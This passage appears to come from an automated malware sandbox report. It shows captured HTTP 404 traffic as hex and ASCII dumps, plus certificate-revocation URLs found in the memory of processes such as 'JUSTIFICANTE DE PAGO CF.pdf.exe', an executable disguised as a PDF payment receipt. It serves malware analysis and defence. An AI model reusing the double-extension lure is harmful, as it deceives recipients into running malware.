79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 2
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:12 GMTExpires: Wed, 28 Feb 2024 20:09:12 GMTServer: EOS (vny/0451)Content-Length: 433Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6f 62 6a 2e 61 63 2e 62 63 6f 6e 2e 65 63 64 6e 73 2e 6e 65 74 2f 65 63 5f 74 70 6d 5f 62 63 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 366097Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:14 GMTExpires: Wed, 28 Feb 2024 20:09:14 GMTLast-Modified: Sat, 17 Feb 2024 14:27:37 GMTServer: ECS (nyb/1D29)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 2
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:22 GMTExpires: Wed, 28 Feb 2024 20:09:22 GMTServer: EOS (vny/0451)Content-Length: 433Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6f 62 6a 2e 61 63 2e 62 63 6f 6e 2e 65 63 64 6e 73 2e 6e 65 74 2f 65 63 5f 74 70 6d 5f 62 63 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 366106Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:23 GMTExpires: Wed, 28 Feb 2024 20:09:23 GMTLast-Modified: Sat, 17 Feb 2024 14:27:37 GMTServer: ECS (nyb/1D29)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 2
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:30 GMTExpires: Wed, 28 Feb 2024 20:09:30 GMTServer: EOS (vny/0451)Content-Length: 433Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6f 62 6a 2e 61 63 2e 62 63 6f 6e 2e 65 63 64 6e 73 2e 6e 65 74 2f 65 63 5f 74 70 6d 5f 62 63 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 366114Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Wed, 21 Feb 2024 20:09:31 GMTExpires: Wed, 28 Feb 2024 20:09:31 GMTLast-Modified: Sat, 17 Feb 2024 14:27:37 GMTServer: ECS (nyb/1D29)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 2
                            Source: Reramvw.exe, 0000000A.00000002.3248921386.0000000006289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACer&
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000635A000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000636C000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2342786428.0000000006790000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.0000000001646000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3256972001.00000000065D5000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3206793882.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006252000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006289000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3246417597.00000000068C2000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3210242387.0000000001105000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2151160347.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2343413127.0000000006807000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2230741842.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3256972001.00000000065D5000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2325501173.0000000000615000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.000000000627E000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2406307664.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3246417597.00000000068C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000636C000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2342786428.0000000006790000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.0000000001646000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3256972001.00000000065D5000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3206793882.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006252000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006289000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3246417597.00000000068C2000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
